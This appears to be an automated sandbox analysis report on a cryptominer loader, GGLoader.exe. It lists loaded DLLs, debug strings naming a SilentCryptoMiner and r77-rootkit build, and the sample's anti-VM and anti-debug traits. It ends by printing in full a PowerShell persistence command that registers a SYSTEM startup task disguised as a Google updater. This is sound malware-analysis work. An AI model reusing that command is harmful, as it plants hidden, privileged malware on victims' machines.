                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\Desktop\GGLoader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: GGLoader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: GGLoader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbQZmW source: powershell.exe, 00000001.00000002.1955811622.000001EC48C05000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: H:\CRYPTOCOIN\Mining\Miner\SilentCryptoMiner\r77-rootkit-master\Stager\obj\x64\Release\Stager.pdb source: LicSend.exe, 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ore.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbD source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1965111928.000001EC48EB5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000026.00000002.2213441971.0000000002851000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: t.Automation.pdb_ source: powershell.exe, 00000001.00000002.1951237178.000001EC48B7C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb23~W4 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb:3FW3 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: powershell.exe, 00000028.00000002.2583801472.000001C536CC8000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

                        Data Obfuscation

                        Source: GGLoader.exe, 00000000.00000000.1702342271.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: dotNetProtector
                        Source: GGLoader.exe, 00000000.00000000.1702342271.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
                        Source: GGLoader.exe | String found in binary or memory: dotNetProtector
                        Source: GGLoader.exe | String found in binary or memory: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
                        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
